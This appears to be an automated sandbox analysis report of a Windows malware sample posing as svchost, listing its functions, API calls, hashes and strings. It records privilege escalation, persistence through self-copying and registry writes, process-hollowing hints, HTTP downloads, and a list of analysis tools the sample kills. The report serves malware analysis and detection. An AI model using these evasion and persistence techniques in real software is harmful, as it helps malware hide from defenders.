                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7E52B4186
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: AdjustTokenPrivileges.KERNELBASE ref: 00007FF7E52B41B1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: CloseHandle.KERNEL32 ref: 00007FF7E52B41BC
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: OpenProcess.KERNEL32 ref: 00007FF7E52B41D1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: CloseHandle.KERNEL32 ref: 00007FF7E52B4249
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$CreateProcess$CloseFileHandleOpenToken$AdjustAttributesCurrentDirectoryFolderLookupPathPrivilegePrivilegesThreadValue
                                                                                                                                                                                                                          • String ID: .x64
                                                                                                                                                                                                                          • API String ID: 3156018730-2481150777
                                                                                                                                                                                                                          • Opcode ID: afb6772baf312ace8b13902d488d759376c55ca1c170216b345ff2e1d52a3f88
                                                                                                                                                                                                                          • Instruction ID: 5caf0dfe925e994e27af1fdcf07abfc97f68b44c98acf041ba3a3a07d89b7c0f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afb6772baf312ace8b13902d488d759376c55ca1c170216b345ff2e1d52a3f88
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C701DBA1E1854A81EE94FB14FC653B5A679AF98B04FC58533D40DC2196CE3CE145C763
                                                                                                                                                                                                                          Function 00007FF7E52B1050 Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 418 7ff7e52b1050-7ff7e52b108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2574300362-0
                                                                                                                                                                                                                          • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                          • Instruction ID: 797435ddb680424ebbc96c2ef9b9917cb678864f7979cf6a571397b3ccc79694
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBE09276508F8486CA60AB15F85011EB7B4FBC8B94F944526EACD82B28DF3CC165CB00
                                                                                                                                                                                                                          Function 00007FF7E52B3B24 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 419 7ff7e52b3b24-7ff7e52b3b33 420 7ff7e52b3b35-7ff7e52b3b42 VirtualFree 419->420 421 7ff7e52b3b48-7ff7e52b3b4c 419->421 420->421
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                                          • Instruction ID: 5b047fbe46b6ce5d9f51d02e9ba33a8e1ff88cf3c86a7bcb6f101778fef8bbcb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FD01261E3894581EBD5AB26EC99719E3A4FBD8F44FC4C036E68A81568CF3CD0998F11

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 00007FF7E52B2048 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                                                                                          • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                          • API String ID: 514040917-3001742581
                                                                                                                                                                                                                          • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction ID: af8e1d7dd572e00a3e9885ed2d59cf6c6c00ae16a050c4d2f9aca983e9266a1d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9432FA7261CBC586EBB5DB15E8647AAB3A5FBC8B40F804136DA8D83B58DF3CD4448B11
                                                                                                                                                                                                                          Function 00007FF7E52B1CDC Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7E52B1D19
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                          • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                          • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                          • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                                          • Instruction ID: 939b8382344564756b92c14c89de0f08a0c4e38c2040c5ce4046036d76f00fc2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D71FBB651CA4586EB909B54F86432AF764FBC8B95F501036FA8E83A68CF7CD444CB11
                                                                                                                                                                                                                          Function 00007FF7E52B30DC Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B45C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3117), ref: 00007FF7E52B460C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B45C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3117), ref: 00007FF7E52B4649
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B45C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3117), ref: 00007FF7E52B4654
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B311C), ref: 00007FF7E52B3BC7
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3B84: RegSetValueExW.ADVAPI32 ref: 00007FF7E52B3BFD
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3B84: RegCloseKey.ADVAPI32 ref: 00007FF7E52B3C0C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF7E52B3C3C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7E52B3E37
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: Process32FirstW.KERNEL32 ref: 00007FF7E52B3E6A
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: CloseHandle.KERNEL32 ref: 00007FF7E52B3E7C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: wcscmp.MSVCRT ref: 00007FF7E52B3E91
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: OpenProcess.KERNEL32 ref: 00007FF7E52B3EA7
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: TerminateProcess.KERNEL32 ref: 00007FF7E52B3ECA
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: CloseHandle.KERNEL32 ref: 00007FF7E52B3ED8
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: Process32NextW.KERNEL32 ref: 00007FF7E52B3EEB
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: CloseHandle.KERNEL32 ref: 00007FF7E52B3EFD
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B39B4: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF7E52B3B0C), ref: 00007FF7E52B39E4
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 00007FF7E52B31C6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                          • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                          • API String ID: 2853470409-928700279
                                                                                                                                                                                                                          • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                                          • Instruction ID: 999d87fb475b494b90df3869ec926774e7e48570c3f5560f715b54259dfee72f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA217BE0A5894A50EA94F720DC713B4E268BF68F50FD44533E45DC21E6DE3DB9098633
                                                                                                                                                                                                                          Function 00007FF7E52B2E6C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID: rbNSpGEsyb
                                                                                                                                                                                                                          • API String ID: 299056699-189039185
                                                                                                                                                                                                                          • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                                          • Instruction ID: 0642ba919600f8b9de3ccd814af6d60c2ab0057cfdc30560ee2d7f126bc5bdd1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C01006290CA0581EB74AB11EC64369A778FBCCF94F880232D94ED2674CF3CE5858622
                                                                                                                                                                                                                          Function 00007FF7E52B3E24 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1083639309-0
                                                                                                                                                                                                                          • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                                          • Instruction ID: 6e480685bd25d188cc00c66421aafef3bbb85132ae6c9baca588b683f5c412bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47212771A0C98981EBB0AB15EC6836AE368FFD8F54F844336C55E825A8DF3DD445CB11
                                                                                                                                                                                                                          Function 00007FF7E52B2F0C Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 299056699-0
                                                                                                                                                                                                                          • Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                                          • Instruction ID: 2a2f7665fd8fecca6a8832b5106b166b0431a5aa711fb25a7b15295ea6cdc311
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E901DE6691CA4582EB64AB21EC6436DA378FBCCF45F840536E98ED2674CF3CD5448622
                                                                                                                                                                                                                          Function 00007FF7E52B3CE4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                          • String ID: Unknown
                                                                                                                                                                                                                          • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                          • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                                          • Instruction ID: a0e41d55a6a38c7a220cbc19af8769bd302f0d948737d3e432776235a3dd0fca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA31D97261CAC585DBB0EB19E8987AAB3A4F798B40F404136DA8DC3B68DF3DD154CB11
                                                                                                                                                                                                                          Function 00007FF7E52B3A74 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7E52B3784
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3744: GetVolumeInformationW.KERNELBASE ref: 00007FF7E52B3801
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3744: wsprintfW.USER32 ref: 00007FF7E52B38A2
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3995
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32 ref: 00007FF7E52B3AB9
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32 ref: 00007FF7E52B3AC4
                                                                                                                                                                                                                          • CopyFileW.KERNEL32 ref: 00007FF7E52B3ADD
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32 ref: 00007FF7E52B3AF5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: Services
                                                                                                                                                                                                                          • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                          • Opcode ID: 311e9769a5f9042a1c4d1274615ef5c6319402c3cf93bf79ed3cbc3423f0458e
                                                                                                                                                                                                                          • Instruction ID: 74b461e13fc68567b4c63897fbb98cac2732082def9488eff697fb992837867f
